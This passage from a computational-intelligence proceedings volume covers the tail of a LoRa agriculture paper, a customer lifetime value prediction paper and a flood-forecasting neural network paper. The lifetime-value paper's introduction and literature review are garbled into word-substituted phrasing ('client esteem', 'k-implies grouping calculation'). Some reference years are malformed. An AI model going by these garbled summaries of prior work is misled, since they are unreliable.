The gateway is also tested in various conditions with a DHT11 sensor.

7 Future Work

The creation of an android or IOS application would be extremely beneficial and can
be undertaken for the future research work. This application will enable farmers to
access an app through their mobile phone and access data related to temperature in
the farm, the value of moisture level in the soil and humidity readings. This would
also give the benefit of increased accessibility and mobility to the farmers.
Moreover, while the ISM band in many developed countries is in the 800MHz
range, it is 433MHz in India. Thus, if an all-purpose LoRa module that can operate in
both frequencies can be developed, it would be very useful because it would eliminate
the need for separate codes for the module to transmit over separate frequencies.
270 J. Chauhan et al.

References

1. Patel, P. (2015). Irrigation problems and their solutions in agriculture. International Journal
of Research in all Subjects in Multi Languages [Subject Economics] (IJRSML) 3(2) ISSN:
2321–2853.
2. Atzori, L., Iera, A., & Morabito, G. (20110) The internet of things: A survey., Computer
Network 54(15), 2787–2805; International Journal of Smart Home 10(4) (2016) Copyright ©
2016 SERSC 299; DOI: https://doi.org/10.24897/acn.64.68.187.
3. Perera, C., Liu, C. H., Jayawardena, S., & Chen, M. (2014). A survey on Internet of Things
from industrial market perspective. IEEE Access, 2, 1660–1679. https://doi.org/10.1109/ACC
ESS.2015.2389854
4. Da Xu, L., He, W., & Li, S. (2014). Internet of things in industries: A survey. IEEE Transaction
Industrial Information, 10(4), 2233–2243. https://doi.org/10.1109/TII.2014.2300753
5. Al-Fuqaha, A., Guizani, M., Mohammadi, M., Aledhari, M., & Ayyash, M. (2015). Internet
of things: A survey on enabling technologies, protocols, and applications. Communications
Surveys & Tutorials, IEEE, 17(4), 2347–2376. https://doi.org/10.1109/COMST.2015.2444095
6. Neumann, P., Montavont, J., & Noël, T. (2016). Indoor deployment of low-power wide area
networks (LPWAN): A LoRaWAN case study. In Proceedings of the IEEE 12th International
Conference on Wireless and Mobile Computing, Networking and Communications (WiMob)
(pp. 1–8). https://doi.org/10.1109/WiMOB.2016.7763213.
7. Terrassona, G., Brianda, R., Basrourb, S., & Arrijuriaa, O. (2009). Energy model for the design
of ultra-low power nodes for wireless sensor networks. Procedia Chem 1, 1195–1198; Davcev,
D, Mitreski, K., & Koteli, N. (2018) IoT agriculture system based on LoRaWAN, In 14th IEEE
International Workshop on Factory Communication System (WFCS). https://doi.org/10.1109/
WFCS.2018.8402368.
8. Gunaseelan, J., & Ellappan (2017). IOT agriculture to improve food and farming technology.
In 2017 Conference on Emerging Devices and Smart Systems (ICEDSS). https://doi.org/10.
1109/ICEDSS.2017.8073690.
9. Nandyala, C. S., & Kim, H. K. (2016). Green IoT agriculture and health application. Interna-
tional Journal of Smart Home, 10(4), 289–300. http://dx.doi.org/https://doi.org/10.14257/ijsh.
2016.10.4.26.
10. Hsu, T. C., Yang, H., Chung, Y. C., & Hsu, C. H. (2018). A Creative IOT agriculture platform
for cloud fog computing. Sustainable Computing: Informatics and Systems, 100285. https://
doi.org/10.1016/j.suscom.2018.10.006.
11. Mekala, M. S., & Viswanathan, P. (2017) A survey: Smart agriculture IoT with cloud
computing. In 2017 International Conference on Microelectronic Devices, Circuits and Systems
(ICMDCS). https://doi.org/10.1109/ICMDCS.2017.8211551.
12. Gondchawar, N., & Kawitkar, R. S. (2016). IoT based smart agriculture. International Journal
of Advanced Research in Computer and Communication Engineering, 5(6). https://doi.org/10.
17148/IJARCCE.2016.56188.
13. Vasisht, D., Kapetanovic, Z., Won, J. H., Jin, X., Chandra, R., Kapoor, A., Sinha, S. N., &
Sudarshan, M. (2017). Sean Stratman; FarmBeats: An IoT Platform for Data-Driven Agricul-
ture. In 14th USENIX Symposium on Networked Systems Design and Implementation (NSDI
’17). Boston, MA, USA; ISBN 978-1-931971-37-9. https://www.usenix.org/conference/nsd
i17/technical-sessions/presentation/vasisht.
14. Prathibha, S. R., Hongal, A., & Jyothi, M. P. (2017). IOT based monitoring system in smart
agriculture. https://doi.org/10.1109/ICRAECT.2017.52.
15. Muangprathub, J., Boonnam, N., Kajornkasirat, S., Lekbangpong, N., Wanichsombat, A., &
Nillaor, P. (2018). IoT and agriculture data analysis for smart farm. j.compag.
Prediction of Customer Lifetime Value
Using Machine Learning

Kandula Balagangadhar Reddy, Debabrata Swain, Samiksha Shukla,


and Lija Jacob

Abstract The idea of viewing customers as resources that ought to be overseen


and whose worth ought to be estimated is currently acknowledged and perceived
by scholastics and professionals. This attention to client relationship management
makes it critical to comprehend customer lifetime value (CLV) in light of the fact
that CLV models are a productive and viable approach to assess an association’s
relationship with its clients. Appraisal of CLV is particularly significant for firms in
executing client situated administrations. In this paper, we give a basic audit of the
writing on the advancement cycle and uses of CLV and also discussed the predictions
of the CLV. The performance of the system is evaluated using mean absolute error
(MAE). The system has obtained the customer lifetime value with the mean absolute
error of 1.23%.

Keywords Customer lifetime value · Customer segmentation · Predictive model

1 Introduction

Worldwide online business exchanges produce $29.267 trillion, including $25.516


trillion for business-to-business (B2B) exchanges and $3.851 trillion for business-
to-purchaser (B2C) deals. Amazon.com speaks to most of all online business
improvement, selling practically 500 Million SKU’s in the USA.
From that point forward, Internet business has progressed to make things more
straightforward to discover and purchase through online retailers and business
focuses. Self-governing advisors, free endeavors, and colossal undertakings have
all benefitted from online business, which enable them to sell their product and
adventures at a scale that was illogical with traditional detached retail. Overall retail
online business bargains are stretched out to reach $27 trillion by 2020.
Client lifetime value (CLV) is one of the key subtleties at risk to be followed as
an element of a customer experience program. CLV is an assessment of how critical

K. B. Reddy (B) · D. Swain · S. Shukla · L. Jacob


CHRIST (Deemed To Be University), Lavasa, Pune, India

© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 271
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_22
272 K. B. Reddy et al.

a customer is to your association with a boundless time period rather than basically
the primary purchase. This estimation supports in understanding a reasonable cost
for every obtainment.
We are living in a customer-centric market. It is very important to get to know a
customer’s lifetime value (CLV). It helps companies to concentrate their activities
around their most “profitable” customers. The better a company understands CLV, the
better it is to create strategies to retain them. So finding the customer lifetime value
will help the business to concentrate their activities around their most “profitable”
customers.
Machine learning algorithms are implemented in this system. Prediction of
customer lifetime is a regression problem. The dataset contains labeled data. Our
goal is to predict customer lifetime value based on labeled customer transaction
data. Therefore, supervised algorithms are used to train the dataset and predict the
outcome. The model considered for this work is the beta geometric/negative bino-
mial regression model. Knowing earlier whether the customer is valuable or not will
help the product selling-based companies to improve their business around valuable
customers. In this system, lifetimes library (from Python programming) is used as a
tool to predict the customer lifetime value.

2 Literature Review

D. Chen et al. [1] and F. Yoseph et al. [2] utilized the k-implies grouping calculation
and choice tree to enable the business to all more likely comprehend its clients and
accordingly lead client-driven advertising all the more successfully. The holes were
discovered that they did not manage client purchasing behaviors. Crafted by P. P.
Pramono et al. [3] utilized hierarchical K-means, Ward’s method to do bunching
bunch assessment. This investigation moved toward two kinds of CLV segmentation
and this shows that frequency was the main variable in this examination. The hole is
since the division is done dependent on certain factors, the organization can modify
its promoting systems just dependent on client conduct. A. J. Christy et al. [4]’s
client division is finished utilizing recency, frequency, and monetary worth (RFM)
investigation and afterward is reached out to different calculations like K-means
grouping and fuzzy C-means. The working of these methodologies is dissected. The
time taken by every calculation to execute is broken down, and the hole is seen that
the proposed K-means approach devours higher time and builds the number of cycles.
The examinations [6] utilized the two models which are known as the BG/BB model
and BG/NBD model to anticipate the client esteem per item. This examination is said
as opposed to utilizing the RFM to foresee the client lifetime esteem, in the event
that we utilize the RFM/P to anticipate the client lifetime esteem it will give more
exactness.
H. Jia et al. [7] utilized the Bayesian organization model of IBM’s SPSS modeler
device to investigate customer lifetime value related to hazard factors in the Internet
business. The hole is that the arrangement of client hazard is simply established
Prediction of Customer Lifetime Value Using Machine Learning 273

on the assessment of undertaking business needs and past composed works, which
may prompt the avoidance of risk factors. Various straight relapse procedures [8] are
utilized as a conventional information investigative strategy for displaying CLV. Also,
in this examination, a system has been proposed clarifying how the interpersonal
organization data can be incorporated into the information investigative models.
Displaying the client lifetime estimation of the carrier clients is picked as the model
case. The proposed procedure has been applied to the example case and discoveries
have been assessed.
Dahana et al. [9] utilized the inactive class model to accomplish how the way of life
can clarify the heterogeneous client lifetime esteems (CLVs) among different market
sections. In the accompanying examinations, different sorts of clustering methods
[10] are utilized to study to exactly characterize character-based shopper impression
of merchandise with country marks by investigating immense measures of exchange
information. Fluffy clustering model [11, 12] is accustomed to clustering system
group customers. In this investigation, a structure was proposed for bunching system
group clients dependent on viable factors, for example, client lifetime, client type,
client entirety, the nature of being key, and the number of programming items.
ANOVA and regression models [13] are utilized in this investigation to ascertain
client value (CE) and to extend the advertising rate of profitability (ROI) by utilizing
hazard recreation with regard to the travel industry and accommodation. Numerical
models [14] are actualized to locate a sound fit between their client devotion plans
and the overarching idea of steadfastness among clients. The Objective of E. Lee
et at [15] is to propose a stir expectation strategy for improving benefit. In this
investigation, they proposed a beat expectation model for improving benefit involving
two chief advances: (1) picking estimate target and (2) tuning breaking point of the
model. Additionally, by considering this model, the ordinary advantage of the online
game is by suggesting the momentum research techniques and applying it to the live
game that has been in the organization for over nine years to check its sufficiency.
Inclination boost trees are [16] used to introduce a numerical model structure for the
assurance of client lifetime esteem. This examination directed a trial examination
of client CLV dependent on genuine informational indexes. In this investigation, as
opposed to attempting to help a base student straightforwardly, apply a slope boosting
calculation.
This research [17] makes two considerable hypothetical and methodological
commitments. To begin with, the examination results both add to our comprehension
of cordiality client firm connections and give an establishment to future neighborli-
ness advertising and client relationship research. While the idea of client connections
has since a long time ago existed, it has not been concentrated as a multidimensional
development. Cordiality analysts would have been, in general, zero in estimating
explicit components of client connections, e.g., client responsibility or dependability.
Second, the proposed client relationship scale gives a relationship advertising struc-
ture to explore focused on better understanding both the impacts of different show-
casing activities and the monetary degree of profitability from promoting exercises
and ventures. The point of [18] work was to make client lifetime esteem is profoundly
significant to build up a system to quantify the incentive across brands and areas. A
274 K. B. Reddy et al.

logical exploration approach was appointed. This examination produces proof, for
example, “lifetime monetary worth (EVC) contrasts by the gathering and the effect
of its drivers additionally differ.” In [19] research, binomial logistic regression is
utilized to predict customer lifetime value through data mining technique in a direct
selling company.

3 Proposed Framework

Prediction of customer lifetime is a regression problem. The dataset contains labeled


data. The proposed work aims to predict customer lifetime value based on labeled
customer transaction data. Therefore, supervised algorithms are used to train the
dataset and predict the outcome. The model considered for this work is the beta
geometric/negative binomial regression model, also called as Buy “til You Die
(BTYD)” model popularized by Peter Fader. The math behind these models is
genuinely mind-boggling yet fortunately, it has been exemplified in the lifetimes
library. The purpose of choosing this model is because it will predict the customer
lifetime value based on the customer transaction history (Fig. 1).
The first step in the model is to build the RFM which is a new dataset that will
contain the recency, frequency, monetary value. Frequency speaks to the quantity
of rehashed buys; recency speaks to that the age of the client when they made their
ongoing buys. Monetary value speaks to the normal worth (or avg. cost) of a given
client’s buys. The second step is to pass the data into the model and it will get trained
by the data to predict the client lifetime value. In the third step, the model fit will be
accessed through the calibration and holdout data.

4 Results

After perfectly executing our models, we can predict the client lifetime value of each
customer and the below figures will show the same results after executing the model.
From the below figures, we can see the forecast for each customer lifetime value
for the next 30 days. We can also see that the probability of a customer being alive
in the upcoming 30 days (Fig. 2).
From Fig. 3 it is clearly visible that the predicted values are close to the actual
values.

4.1 Mean Absolute Error

Absolute error is the measure of blunder in estimations as shown in Eq. 1. It is


the distinction between the anticipated (or estimated) esteem and genuine (or valid)
Prediction of Customer Lifetime Value Using Machine Learning 275

Fig. 1 Architecture of the model

esteem.

1 
n
M AE = ( ) |yi − xi | (1)
n i=1

Here, yi = prediction, x i = true value, n = total number of points The mean


absolute error is: 1.23%
276 K. B. Reddy et al.

Fig. 2 Forecasting next 30 days

Fig. 3 Line chart of actual


verses predicted

5 Conclusion

The lifetime value of a customer, or customer lifetime value (CLV), speaks to


the whole measure of money a client is anticipated to spend in the business, or
on company products, during their lifetime. This is regularly an urgent figure to
comprehend because it encourages the company to make choices about what extent
of cash to take a situation in securing new clients and holding existing ones. In
this way, analyzing the customer lifetime value is imperative to organizations to
become more acquainted with which client is faithful to their organization in this
project beta geometric/negative binomial distribution model (BG/NBD) chosen. The
reason for chosen this model is because the beta geometric/negative binomial distri-
bution (BG/NBD) predicts future purchasing based on customers’ observed purchase
history. To predict the customer lifetime value, this model is chosen. And the model
Prediction of Customer Lifetime Value Using Machine Learning 277

evaluation is done to see how the model is predicting when compared to the actual
ones. In this work, it has been clearly demonstrated through the literature review
and introduction, how the customer lifetime value can be helpful to the companies,
for that, the system is developed using the RFM, the score factor was showed the
performance of the model.

References

1. Chen, D., Sain, S. L., & Guo, K. (2012). Data mining for the online retail industry: A case study
of RFM model-based customer segmentation using data mining. Journal Database Marketing
Customer Strategic Management, 19(3), 197–208. https://doi.org/10.1057/dbm.2012.17
2. Yoseph, F., & Heikkila M. (2019). Segmenting retail customers with an enhanced RFM and
a hybrid regression/clustering method. In Processing of International Conference of Machine
Learning Data Engineering. iCMLDE 2018 (Vol. Clv, pp. 77–82). https://doi.org/10.1109/iCM
LDE.2018.00029.
3. Pramono, P. P., Surjandari, I., & Laoh, E. (20190). Estimating customer segmentation based
on customer lifetime value using two-stage clustering method. In 2019 16th International
Conference Services System Services Management ICSSSM 2019. (Vol. 1994, pp. 1–5). https://
doi.org/10.1109/ICSSSM.2019.8887704.
4. Christy, A. J., Umamakeswari, A., Priyatharsini, L., Neyaa, A. (2018). RFM ranking—An
effective approach to customer segmentation. Journal of King Saud Universal—Computer
Information Science. https://doi.org/10.1016/j.jksuci.2018.09.004.
5. Heldt, R., Silveira, C. S., & Luce, F. B. (2019). Predicting customer value per product: From
RFM to RFM/P. Journal Business Resources. https://doi.org/10.1016/j.jbusres.2019.05.001.
6. He, X., & Li, C. (2017). The research and application of customer segmentation on e-commerce
websites. In Proceedings—2016 International Conference Digital Home, ICDH 2016 (pp. 203–
208). https://doi.org/10.1109/ICDH.2016.050.
7. Jia, H. & Li, C. (2019) The research of customer lifetime value related to risk factors in
the internet business. In Proceedings—18th IEEE/ACIS International Conference Computer
Information Science ICIS 2019 (Vol. 1, pp. 105–110). https://doi.org/10.1109/ICIS46139.2019.
8940315.
8. Çavdar, A. B., & Ferhatosmanoğlu, N. (2018). Airline customer lifetime value estimation using
data analytics supported by social network information. Journal of Air Transport Management,
67, 19–33. https://doi.org/10.1016/j.jairtraman.2017.10.007
9. Dahana, W. D., Miwa, Y., & Morisada, M. (2019). Linking lifestyle to customer lifetime value:
An exploratory study in an online fashion retail market. Journal of Business Resource, 99,
319–331. https://doi.org/10.1016/j.jbusres.2019.02.049
10. Chiang, L. L., & Yang, C. S. (2018). Does country-of-origin brand personality generate retail
customer lifetime value? A big data analytics approach. Technology Forecasting Social Change,
130, 177–187. https://doi.org/10.1016/j.techfore.2017.06.034
11. Hasanpour, Y., Nemati, S., & Tavoli, R. (2018). Clustering system group customers through
fuzzy C-Means clustering. In Proceedings—2018 4th Iranian Conference Signal Processing
Intelligence System ICSPIS 2018. (pp. 161–165). https://doi.org/10.1109/ICSPIS.2018.870
0548.
12. Monalisa, S., Nadya, P., & Novita, R. (2019). Analysis for customer lifetime value categoriza-
tion with RFM model. Procedia Computer Science, 161, 834–840. https://doi.org/10.1016/j.
procs.2019.11.190
13. Kim, Y. P., Boo, S., & Qu, H. (2018). Calculating tourists’ customer equity and maximizing the
hotel’s ROI. Tourism Management, 69(March), 408–421. https://doi.org/10.1016/j.tourman.
2018.05.001
278 K. B. Reddy et al.

14. Srivastava, M., & Rai, A. K. (2018). Mechanics of engendering customer loyalty: A conceptual
framework. IIMB Management Review, 30(3), 207–218. https://doi.org/10.1016/j.iimb.2018.
05.002
15. Lee, E., Kim, B., Kang, S., Kang, B., Jang, Y., & Kim, H. K. (2018). Profit optimizing churn
prediction for long-term loyal customers in online games. IEEE Transaction Games, 12(1),
41–53. https://doi.org/10.1109/tg.2018.2871215
16. Singh, L., Kaur, N., & Chetty, G. (2018) Customer life time value model framework using
gradient boost trees with RANSAC response regularization. In Proceeding International Jt.
Conference Neural Networks (Vol. 2018-July, pp. 1–8). https://doi.org/10.1109/IJCNN.2018.
8489710.
17. Hyun, S. S., & Perdue, R. R. (2017). Understanding the dimensions of customer relationships
in the hotel and restaurant industries. International Journal of Hospitality Management, 64,
73–84. https://doi.org/10.1016/j.ijhm.2017.03.002
18. Baidya, M. K., Maity, B., Ghose, K. (2019). Innovation in marketing strategy: A customer
lifetime value approach 25, 25–41. https://doi.org/10.6347/JBM.201909.
19. Mauricio, A. P., Payawal, J. M. M., Dela Cueva, M. A., & Quevedo, V. C. (2016) Predicting
customer lifetime value through data mining technique in a direct selling company. In 2016
International Conference Industrial Engineering Management Science Application (pp. 1–5).
https://doi.org/10.1109/ICIMSA.2016.7504027.
An Intelligent Flood Forecasting System
Using Artificial Neural Network in WSN

K. S. Raghu Kumar and Rajashree V. Biradar

Abstract The flood forecasting system is widely used in the hydrological research,
and neural network has provided considerable assistance in the prediction of the
flood. The flood alert system enhances by mitigating the damage and public safety.
The proposed model is an intelligent flood alerting system using the neural network
for a wireless sensor network (WSN). The neural network model is composed of past
rainfall measurements with rainfall in diverse duration and flow of water. Various
environmental factors are considered, while training the proposed model and the
significant insights are framed. This paper incorporates the fuzzy and sigmoid func-
tion for the identification runoff rainfall process. The proposed model is investigated
by comparing the parameters end to end delay, packet loss, and throughput. From
the observation and comparison of results, the proposed model has the best outcome.
The simulation analysis is compared with the existing approach and obtained an
effective prediction.

Keywords Neural network · Flood forecasting · Water level · Packet loss · And
throughput

1 Introduction

The main intent of flood prediction is minimizing the impact of economic factors and
the risk of human lives [1–3]. An effective flood alert system assists the collection
of data, analysis of collected data, monitoring the scenario of rainfall, and warning
the people about the flood with the increased water level. Wireless sensor nodes
and wireless sensor networks play a prominent role in the entire process of flood
prediction [4]. The nodes in the sites will gather the data about the atmospheric

K. S. R. Kumar
Department of CSE, RYM EC, Ballari, Karnataka, India
R. V. Biradar (B)
Department of CSE, BITM, Ballari, Karnataka, India

© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 279
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_23
280 K. S. R. Kumar and R. V. Biradar

condition, whereas a microcontroller is instilled to analyze the gathered data about


the site and thereby gives the flood alert to the people [5, 6].
Humanity across the world is blessed with nature, and this scenario will alter the
situation by making natural calamities [7]. The disaster across the world causes a
great impact on the life of humans and sustainable progress toward the enhanced
future [8–11]. Technological and research development has made the researchers
develop predicting and alerting approaches for the calamities [12, 13]. Among that
plight of the flood is indefinable, which causes the life of humans more complicated,
and an effective system is needed. The development of wireless and computer-based
approaches is initiated by the researcher to predict the flood. This system will monitor
the rainfall and water level which forecast the flood [14].
The sensor nodes are placed at diverse locations, which collects information about
the environmental factors related to rainfall. The collected information is stored in
the database servers to predict the pattern of rainfall. The generated patterns are
used for the analysis and the prediction of the occurrence of a flood. The data is
analyzed by various researchers with diverse algorithms. The existing algorithm for
flood prediction has numerous ineffectiveness in the prediction process. The flood
forecasting system is highly sensitive, and ineffectiveness may lead to high disaster in
the life of humans. To overcome the drawbacks in the existing approach, an enriched
algorithm is introduced in this paper, which is discussed in the subsequent section.
The real-time flood monitoring, as well as water-level prediction systems, is
developed, and they are ineffective in the prediction. The utilization of data-driven
approaches is familiar in recent days, and they are highly used to minimize the dura-
tion of computation and permit real-time intelligent flood forecasting. An artificial
neural network (ANN)-based approach is developed to predict the flood from the
rainfall data. The proposed approach attained the best result when compared with
the existing scheme. The process of predicting the flood is one of the significant and
essential approaches, whereas the ANN-based model has a diverse advantage over
the existing approach in terms of performance and prediction.
The remaining of the paper is organized as follows, available flood prediction
approaches, and their drawbacks are explained in Sect. 2, the intelligent flood fore-
casting system with a neural network is described in Sect. 3, experimental results
are illustrated in Sect. 4, and the proposed forecasting framework is concluded with
a suggestion for future work in Sect. 5.

2 Related Work

The disaster caused in Southeast Asia results in great loss of economic damage and
the life of living beings. The international agencies and government have formu-
lated the disaster response methods are developed with the remote sensing data that
monitors the environment temporarily and spatially [15]. The normalized difference
vegetation index is applied to train the water classifier that is used to the interest of
the time. The operational flood identification component is generated that performs
An Intelligent Flood Forecasting System Using … 281

the composition of the image. The radar-based observation of historic rainfall event
and assessment accuracy is presented. The decision support approach has provided
a supportive tool and needed information to the developing organization.
The operational risk in the flood is managed by the global flood partnership, and
the result is used to monitor and predict the flood event [16]. The developed approach
reduced the impact of the disaster and maintained emergency operations effectively.
The flood prediction model developed using a wireless sensor network [17] predict
the occurrence of flood in the river that is fast and simple. The proposed approach
has saved the people by predicting the flood effectively.
The linear regression approach is incorporated with WSN and uses multiple vari-
ables. The approach is reliable and independent of parameters where the approach is
desirable for any real-time scenario. The approach is effective for several situations
and has some limitations in the performance, namely ineffective and inaccuracy. In
certain countries, rainfall and typhoons are more general where the intensified and
prolonged rainfall causes flood [18].
A predictive model is developed to predict the status of rainfall and flood. From
the rain gauge, rainfall data is collected using the sensors and microcontrollers. The
data is further used in the analyses, and it gives the advisories as well as a warning to
the relevant person. Environmental factors like rainfall amount, temperature, water
level, and humidity. The information from the sensor nodes helps in the prediction
of flood and water levels [19].
Flood is a recurrent disaster across the world that happens due to excess flow of
water, specifically in low-lying spaces. The excellence of water adopts the lifespan
of existing belongings on the earth. The proposed system defines the deployment and
design of real-time water and flood quality observing system with a fast and simple
estimation that provides effective regulator measures [20].
The main approach of the steamflood and waterflood tracking system (SWATS)
[21] is permitting the incessant observing system for the steamflood and water-
flood systems with granularity attention, short delay, and low cost while giving high
reliability and effective accuracy. The identification and anomaly recognition is a
challenging scheme because of the intrinsic unreliability and inaccuracy of sensors
that are transitory with the characteristics of the water flows. The inefficiency and
inaccuracy in the existing approach are rectified using the artificial neural network,
and it is discussed in Sect. 3.

3 Flood Forecasting Framework

The proposed flood forecasting system is designed by a general hydrological


approach, and the approach uses the past measurement of rainfall. The available
approaches are ineffective in prediction, and hence, the system is developed with a
neural network, which enhances the prediction and performance of the flood fore-
casting system. The flood forecasting system with the proposed neural network
282 K. S. R. Kumar and R. V. Biradar

Fig. 1 Flood forecasting system with neural network

approach is illustrated in Figure. The overall testing and training of rainfall data
using a neural network for forecasting the rainfall are displayed in Fig. 1.
The process of runoff of rainfall is modeled via a neural network with the level
of water at a(t + l) as the target value is identified, and it has one hidden layer.
The water level of past rainfall is taken as input, and it is associated with the m, n
available gauges of rain rf1 , rf2 , …, rfn , and the time lag is signified as tl1 , tl2 , …, tln .
The time utilized by the rainwater to join the river is considered with time lags, and
every input gauge point is with equal order q. The rainfall measures with exogenous
variable is given as, rf1 (t − tl1 ), rf1 (t − tl1 − 1), …, rf1 (t − tl1 − q + 1, …, rfn (t −
tln ), …, rfn (t − tln − q + 1), and the input for overall network input is (a + n * q)
variables. The vector v is composed of all the input variables.
Within the developed network, the hidden layer sums the input value at the kth
node, and it is equated as follows,


j=a+n∗q
Xk = w jk vi − bk (1)
j=0

where the weight wjk is assigned for input vj at the kth node and the neuron bias is
bk . The signal rate X k turned as an argument of the activate function at the neuron.
An Intelligent Flood Forecasting System Using … 283

Table 1 Assignment of
Data collection High Medium Low
threshold value
Humidity >40% 20–40% <20%
Water Level >72% 30–72% <30%
Vibration >150 mH 50–150 mH <50 mH
Temperature >34 °C 15–34 °C <15 °C

The sigmoid function is incorporated with the activation function.

2
Ck = f (X k ) = 1 −     (2)
exp 2X j + 1

The outputs of ck in the hidden layer neuron are then transmitted to the output
layer, and it has a linear node with unique data which weights the values of ck by
W k . This will return the value for the forecast

a(t + l) = Wk Ck − bot (3)
k

where bot denotes the bias value correlated with the neuron and the network value is
organized as a direct forecaster. This value returns the l steps ahead prediction evade
the intermediary forecast system necessitated by the recursive system that may give
an error value with propagation rate. In the context of mild supposition, a direct
identifier is illustrated to give the best performance than the recursive approach. The
threshold value assignment and the forecasting are given in Tables 1 and 2.
The data is collected from diverse sensor nodes and processed with the help
of WSN approach. The dataset is trained using neural network, and the activation
function is applied acquire the decision from the testing data. The overall performance
of the algorithm is illustrated in Fig. 2.

Table 2 Forecasting framework for disaster identification


Sensor level Vibration Temperature Humidity Months Output
Low Low Normal Low January and February No
Normal Low High Low March and April No
High Normal Normal Normal May and June Yes
High High Normal High July and August No
High High Low High September and October Yes
Normal Normal Low High November and December Yes
284 K. S. R. Kumar and R. V. Biradar

Fig. 2 Overall training and


testing the rainfall data using
ANN
An Intelligent Flood Forecasting System Using … 285

4 Result and Discussion

Our proposed flood forecasting system is simulated using network simulator (NS2),
and the experiment is implemented with the help of MATLAB. Network parameters,
namely delay, packet loss, and throughput are compared, whereas the size of the
packet is constant that is transmitted at the interval of 1 s. The hidden layer of
the network is kept static with 12 neurons at one layer. The resultant value of the
simulation is given in Tables 3, 4, and 5.
Throughput is the actual quantity of data sent or received successfully over the
communication link. Throughput is measured as bps, and it is diverse from the band-
width. It is the total unit of information measure that can process in a given amount
of time. The topology with higher throughput is the best topology with effective
performance. From Table 3, the proposed topology has the highest throughput, and
it is illustrated in Fig. 3.
Packet loss is the rate of data loss during the data transmission across the commu-
nication channel, and it is caused by an error in the network, congestion in the
network, data flooding, and breakage of links in the network. The topology with a
minimum percentage of packet loss is considered as the best topology, and the simu-
lation analysis is given in Table 4. From the results, it is identified that the proposed
model has the best result, and it is illustrated in Fig. 4 (Fig. 5).

Table 3 Comparison of
Number of nodes Topology
throughput and number of
nodes Star Mesh Proposed model
125 150 155 160
175 140 145 155
220 130 135 150
275 135 140 145
325 120 130 140
375 115 125 135
425 100 110 125

Table 4 Comparison of
Pause time (s) Topology
packet loss and pause time
Star Mesh Proposed model
50 20 18 15
100 34 31 29
150 42 39 37
200 56 51 49
250 58 53 51
300 60 59 58
350 63 60 59
286 K. S. R. Kumar and R. V. Biradar

Table 5 Comparison of end


Number of nodes Topology
to end delay and number of
nodes Star Mesh Proposed model
125 12 11 10
175 15 14 12
220 18 16 14
275 21 18 15
325 23 22 19
375 25 24 21
425 26 25 20

THROUGHPUT VS NODES
Star Mesh Proposed Model
200
THROUGHPUT IN BPS

150

100

50

0
1 25 1 75 2 20 275 3 25 3 75 4 25
NUMBER OF NODES

Fig. 3 Comparison of the number of node versus throughput

PACKET LOSS VS PAUSE TIME


Star Mesh Proposed Model
70
PACKET LOSS IN %

60
50
40
30
20
10
0
50 100 1 50 2 00 2 50 3 00 350

PAUSE TIME IN SEC

Fig. 4 Comparison of packet loss versus pause time


An Intelligent Flood Forecasting System Using … 287

COMPARISON OF DELAY VS NODES


Star Mesh Proposed Model

END TO END DELAY IN SEC 30


25
20
15
10
5
0
125 175 220 275 325 375 425
NUMBER OF NODES

Fig. 5 Comparison of end to end delay versus number of nodes

Table 6 Training and


Number of epochs Training error Checking error
checking error for different
epochs 50 0.25 0.57
100 0.21 0.59
150 0.18 0.60
200 0.16 0.61

From the observation of results and comparison with various parameters, the
proposed approach attained the best result. The flood detection process is highly
effective with the proposed ANN model.
The proposed model is trained with a backpropagation approach, and it uses the
sigmoid activation function with the learning rate 0.8 and error rate 10–3 . The root
mean square error (RMSE) for training and checking error for different iteration is
given in Table 6.
The root mean square error (RMSE) for training and checking error for different
iteration is given in Figs. 6 and 7. The occurrence of training and checking error in
the proposed approach is minimum, and hence, the accuracy is enriched.

5 Conclusion

An intelligent flood alerting system is developed using the neural network for the
wireless sensor network (WSN). The sensor nodes scattered across the network
utilizes a very low power network, which collects the data like rainfall, rate of rainfall
for every month, humidity, and speed of air in the atmosphere. Various environmental
factors are considered, while training the proposed model and the significant insights
are framed. The proposed model is tested by considering the parameters like an end to
end delay, packet loss, and throughput. From the observation of results, the proposed
288 K. S. R. Kumar and R. V. Biradar

Training Error
0.3

0.25

0.2

0.15

0.1

0.05

0
50 100 150 200
NUMBER OF EPOCHS
Training Error

Fig. 6 Training error

Checking Error
0.62
0.61
0.6
0.59
0.58
0.57
0.56
0.55
50 100 150 200
NUMBER OF EPOCHS
Checking Error

Fig. 7 Checking error

model has the best outcome. The flood alert system is framed with the assistance of
threshold assignment, whereas the prediction of the result is effective with promising
simulation analysis. The simulation parameter of the proposed scheme is investigated
by comparing it with the existing star and mesh topology. The proposed approach
attained the best outcome. In the future, the proposed approach is used to predict the
flood in various locations.

References

1. Ragnoli, M., Barile, G., Leoni, A., Ferri, G., & Stornelli, V. (2020). An autonomous low-power
LoRa-based flood-monitoring system. Journal of Low Power Electronics and Applications,
10(2), 15.
An Intelligent Flood Forecasting System Using … 289

2. Shamsi, S. (2019). Flood forecasting review using wireless sensor network. Global Sci-Tech,
11(1), 13–22.
3. Patil, P. S., & Jain, S. S. Survey on flood monitoring & alerting systems.
4. Dwivedi, R. K., Kumari, N., & Kumar, R. (2020). Integration of wireless sensor networks with
cloud towards efficient management in IoT: A review. In Advances in data and information
sciences (pp. 97–107). Springer.
5. Ullah, T. F., Gnana Prakasi O. S., & Kanmani, P. (2020). A review on flood prediction algorithms
and a deep neural network model for estimation of flood occurrence. International Research
Journal of Multidisciplinary Technovation, 2(5), 8–14.
6. Sakib, S. N., Ane, T., Matin, N., & Kaiser, M. S. (2016). An intelligent flood monitoring
system for Bangladesh using wireless sensor network. In 2016 5th International Conference
on Informatics, Electronics and Vision (ICIEV) (pp. 979–984). IEEE.
7. Aziz, N. A. A., & Aziz, K. A. (2011, February). Managing disaster with wireless
sensor networks. In 13th International Conference on Advanced Communication Technology
(ICACT2011) (pp. 202–207). IEEE.
8. Pant, D., Verma, S., & Dhuliya, P. (2017, September). A study on disaster detection and manage-
ment using WSN in Himalayan region of Uttarakhand. In 2017 3rd International Conference
on Advances in Computing, Communication and Automation (ICACCA)(Fall) (pp. 1–6). IEEE.
